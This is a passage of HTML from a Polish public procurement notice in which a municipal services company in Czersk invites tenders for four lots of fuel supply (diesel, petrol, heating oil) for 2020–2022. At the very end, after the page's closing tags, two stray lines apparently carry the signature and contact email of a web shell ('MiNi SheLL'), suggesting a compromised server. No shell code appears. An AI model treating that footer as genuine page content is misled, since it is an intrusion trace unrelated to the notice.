id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zamawiający wymaga od wybranego Wykonawcy zamówienia zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze umowy odpowiednio dla każdej z części przedmiotu zamówienia – wg zał. nr 9, zał. nr 9A, zał. nr 9B i zał. nr 9C do SIWZ.2. Warunki istotnych zmian umowy w stosunku do treści oferty odpowiednio dla każdej z części przedmiotu zamówienia opisane są w § 10 wg zał. nr 9, zał. nr 9A, zał. nr 9B i zał. nr 9C do SIWZ – wzór umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-05-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Dostawa paliw płynnych na potrzeby Zakładu Usług Komunalnych Sp. z o. o. CZĘŚĆ 1: Dostawa oleju napędowego do zbiorników pojazdów Zamawiającego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	SPOSÓB DOSTAWYDostawa oleju napędowego odbywać się będzie poprzez tankowanie pojazdów oraz kanistrów z przeznaczeniem do pojazdów i sprzętu, będących własnością Zamawiającego z dystrybutorów (odmierzaczy z aktualną legalizacją) Wykonawcy. Uwaga: Sprzedawca zobowiązany jest do umożliwienia odbioru paliwa na terenie miasta Czersk lub w odległości do 3 km od granic miasta.2.	WYMAGANIA DLA PALIWAOlej napędowy musi spełniać następujące wymagania:a)	Ze względu na właściwości niskotemperaturowe rozróżnia się trzy gatunki oleju napędowego odpowiadające paliwom klimatu umiarkowanego, tj. letni, przejściowy i zimowy. Skład paliwa powinien być dostosowany do odpowiedniej pory roku.b)	Olej napędowy musi być czysty mikrobiologicznie i musi być odporny w okresie całego roku na ewentualne skażenia biologiczne w zbiornikach i instalacji stacji paliw i pojazdów.c)	ON nie może zawierać dodatków metalicznych na bazie manganu, w tym trikarbonylku (metylocyklopentadieno) manganowego (MMT).3.	DOKUMENTACJA ZAKUPUa)	Sprzedawca dokumentuje każdorazowe wydanie paliwa z dystrybutora. b)	Wymagane jest potwierdzenie przez pracownika Zamawiającego na odpowiednim druku czynności zakupu paliwa. Wzór druku może zostać wskazany przez Sprzedawcę, lecz winien zawierać datę, numer rejestracyjny pojazdu, ilość i rodzaj pobranego paliwa oraz podpis kierowcy. c)	Zamawiający dopuszcza, aby potwierdzenie zakupu paliwa następowało za pomocą karty paliwowej po zatwierdzeniu kodem PIN, z zastrzeżeniem, że każdy wskazany przez Zamawiającego pracownik otrzyma bezpłatnie indywidualną kartę paliwową wraz z unikalnym kodem PIN. Zamawiający wymaga, aby przy realizacji tankowania za pomocą karty paliwowej pracownik ZUK Sp. z o. o. otrzymał każdorazowo potwierdzenie transakcji. d)	Karty paliwowe wystawiane są i dostarczone do Zamawiającego na koszt Wykonawcy, przewidywana ilość kart w trakcie trwania umowy do 75 sztuk (karty nowe, karty wymienne - na skutek zagubienia, kradzieży, zmiany dotychczasowych danych itp.). 4.	ROZLICZENIERozliczenie dostaw nastąpi na podstawie okresowych faktur zbiorczych. Do każdej zbiorczej faktury Sprzedawca dołączy szczegółowe zestawienie transakcji dokonanych w danym okresie. Zestawienie winno zawierać:a)	datę zakupu,b)	nr rejestracyjny pojazdu,c)	imię i nazwisko kierowcy,d)	ilość i rodzaj tankowanego paliwa.Sprzedaż paliw dokonywana będzie według cennika cen detalicznych stacji paliw Wykonawcy obowiązującego w dniu odbioru paliw z każdorazowym uwzględnieniem przysługującego Zamawiającemu rabatu kwotowego.5.	ILOŚĆSzacunkowa ilość zamawianego paliwa:a)	olej napędowy - około 30.000 litrów <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>09134100-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-07-01<br/>data zakończenia: 2022-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Średnia cena detaliczna 1 l. ON</td><td style="border: 1px solid black;border-collapse: collapse;">50,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Upust</td><td style="border: 1px solid black;border-collapse: collapse;">50,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawa paliw płynnych na potrzeby Zakładu Usług Komunalnych Sp. z o. o. CZĘŚĆ 2: Dostawa benzyny bezołowiowej do zbiorników pojazdów Zamawiającego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	SPOSÓB DOSTAWYDostawa benzyny bezołowiowej odbywać się będzie poprzez tankowanie pojazdów oraz kanistrów z przeznaczeniem do pojazdów i sprzętu, będących własnością ZUK Sp. z o. o. z dystrybutorów (odmierzaczy z aktualną legalizacją) Sprzedawcy. Uwaga: Sprzedawca zobowiązany jest do umożliwienia odbioru paliwa na terenie miasta Czersk lub w odległości do 3 km od granic miasta.2.	WYMAGANIA DLA PALIWABenzyna musi spełniać następujące wymagania:a)	Ze względu na parametry lotnościowe rozróżnia się trzy gatunki benzyny odpowiadające paliwom klimatu umiarkowanego, tj. letni, przejściowy i zimowy. Skład paliwa powinien być dostosowany do odpowiedniej pory roku.b)	Benzyna musi być czysta mikrobiologicznie i musi być odporny w okresie całego roku na ewentualne skażenia biologiczne w zbiornikach i instalacji stacji paliw i pojazdów.3.	DOKUMENTACJA ZAKUPUa)	Sprzedawca dokumentuje każdorazowe wydanie paliwa z dystrybutora. b)	Wymagane jest potwierdzenie przez pracownika Zamawiającego na odpowiednim druku czynności zakupu paliwa. Wzór druku może zostać wskazany przez Sprzedawcę, lecz winien zawierać datę, numer rejestracyjny pojazdu, ilość i rodzaj pobranego paliwa oraz podpis kierowcy. Zamawiający dopuszcza, aby potwierdzenie zakupu paliwa następowało za pomocą karty paliwowej po zatwierdzeniu kodem PIN, z zastrzeżeniem, że każdy wskazany przez Zamawiającego pracownik otrzyma bezpłatnie indywidualną kartę paliwową wraz z unikalnym kodem PIN. Zamawiający wymaga, aby przy realizacji tankowania za pomocą karty paliwowej pracownik ZUK Sp. z o. o. otrzymał każdorazowo potwierdzenie transakcji. Karty paliwowe wystawiane są i dostarczone do Zamawiającego na koszt Wykonawcy, przewidywana ilość kart w trakcie trwania umowy do 75 sztuk (karty nowe, karty wymienne - na skutek zagubienia, kradzieży, zmiany dotychczasowych danych itp.).4.	ROZLICZENIERozliczenie dostaw nastąpi na podstawie okresowych faktur zbiorczych. Do każdej zbiorczej faktury Sprzedawca dołączy szczegółowe zestawienie transakcji dokonanych w danym okresie. Zestawienie winno zawierać:a) datę zakupu,b)	nr rejestracyjny pojazdu,c)	imię i nazwisko kierowcy,d)	ilość i rodzaj tankowanego paliwa.Sprzedaż paliw dokonywana będzie według cennika cen detalicznych stacji paliw Wykonawcy obowiązującego w dniu odbioru paliw z każdorazowym uwzględnieniem przysługującego Zamawiającemu rabatu kwotowego.5.	ILOŚĆSzacunkowa ilość zamawianego paliwa:a)	benzyna bezołowiowa 95 - około 2.000 litrów<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>09132100-4, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-07-01<br/>data zakończenia: 2022-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Średnia cena detaliczna 1 l. Pb</td><td style="border: 1px solid black;border-collapse: collapse;">50,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Upust</td><td style="border: 1px solid black;border-collapse: collapse;">50,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Dostawa paliw płynnych na potrzeby Zakładu Usług Komunalnych Sp. z o. o. CZĘŚĆ 3: Dostawa oleju napędowego do zbiornika naziemnego w siedzibie Zamawiającego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	SPOSÓB DOSTAWYa)	Dostawa oleju napędowego będzie realizowana poprzez uzupełnienie stanu paliwa zbiornika naziemnego znajdującego się w siedzibie Spółki. b)	Jednorazowo uzupełniana będzie pojemność od 500 l. do 5000 l. Sprzedawca zrealizuje dostawę w ciągu 48 godzin od momentu zgłoszenia telefonicznego takiej potrzeby przez Zamawiającego. c)	Sukcesywne dostawy paliw będą realizowane transportem zorganizowanym przez Wykonawcę na jego koszt i odpowiedzialność, według aktualnych potrzeb Zamawiającego.d)	Koszt transportu paliwa zawarty jest w cenie ofertowej.e)	Olej napędowy należy dostarczać autocysternami dysponowanymi przez Wykonawcę na jego koszt do zbiornika naziemnego Zamawiającego zlokalizowanego w Czersku ul. Kilińskiego 15 w godzinach 7:00 – 15:00. Cysterna musi być wyposażona w zawór do pobierania próbek paliwa.2.	DOKUMENTACJA ZAKUPUa)	Sprzedawca dokumentuje każdorazowe wydanie paliwa. b)	Wymagane jest potwierdzenie przez pracownika Zamawiającego na odpowiednim druku dostarczenia paliwa. Wzór druku może zostać wskazany przez Sprzedawcę, lecz winien zawierać datę i godzinę dostawy, ilość i rodzaj dostarczonego paliwa oraz podpis pracownika.3.	ROZLICZENIEa)	Oferowana cena netto 1 litra oleju napędowego winna zawierać łącznie cenę oleju napędowego wraz z kosztami transportu do magazynu Zamawiającego.b)	Podstawą sporządzenia oferty jest upust (lub marża) wyrażony w % stosunku do uśrednionej ceny netto 1.000 l. oleju napędowego (Ekodiesel) w temperaturze 15°C publikowanej przez PKN Orlen na dzień składania oferty.c)	Zaoferowany procentowy upust (lub marża) jest niezmienny przez cały okres trwania umowy.d)	Rozliczenie dostaw nastąpi na podstawie faktury wystawianej po dokonaniu dostawy. Sposób płatności przelew 14 dni. Do każdej faktury Sprzedawca dołączy szczegółowe zestawienie, które winno zawierać kserokopię certyfikatu potwierdzającego, jakość oleju napędowego potwierdzoną za zgodność z oryginałem.4.	ILOŚĆSzacunkowa ilość zamawianego oleju napędowego: około 150.000 litrów<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>09134100-8, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-07-01<br/>data zakończenia: 2022-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Upust/Marża</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Dostawa paliw płynnych na potrzeby Zakładu Usług Komunalnych Sp. z o. o. CZĘŚĆ 4: Dostawa oleju opałowego do zbiornika w kotłowni w siedzibie Zamawiającego</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	SPOSÓB DOSTAWYa)	Dostawa oleju opałowego będzie realizowana poprzez uzupełnienie stanu paliwa zbiornika kotłowni olejowej znajdującej się w siedzibie Spółki. b)	Jednorazowe uzupełnienie będzie o pojemności 1.000 l. Sprzedawca zrealizuje dostawę w ciągu 48 godzin od momentu zgłoszenia telefonicznego takiej potrzeby przez Zamawiającego. c)	Koszt transportu paliwa zawarty jest w cenie ofertowej.2.	DOKUMENTACJA ZAKUPUa)	Sprzedawca dokumentuje każdorazowe wydanie paliwa. b)	Wymagane jest potwierdzenie przez pracownika ZUK Sp. z o. o. na odpowiednim druku dostarczenia paliwa. Wzór druku może zostać wskazany przez Sprzedawcę, lecz winien zawierać datę i godzinę dostawy, ilość i rodzaj dostarczonego paliwa oraz podpis pracownika.3.	ROZLICZENIERozliczenie dostaw nastąpi na podstawie faktury wystawianej po dokonaniu dostawy. Do każdej faktury Sprzedawca dołączy szczegółowe zestawienie, które winno zawierać:a)	miejsce i datę zakupu,b)	ilość pobranego oleju opałowego, c)	kserokopię certyfikatu potwierdzającego jakość oleju opałowego potwierdzoną za zgodność z oryginałem.4.	ILOŚĆSzacunkowa ilość zamawianego oleju opałowego: około 8.500 litrów<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>09135100-5, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-07-01<br/>data zakończenia: 2022-06-30<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Średnia cena detaliczna 1 l. OP</td><td style="border: 1px solid black;border-collapse: collapse;">50,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Upust</td><td style="border: 1px solid black;border-collapse: collapse;">50,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com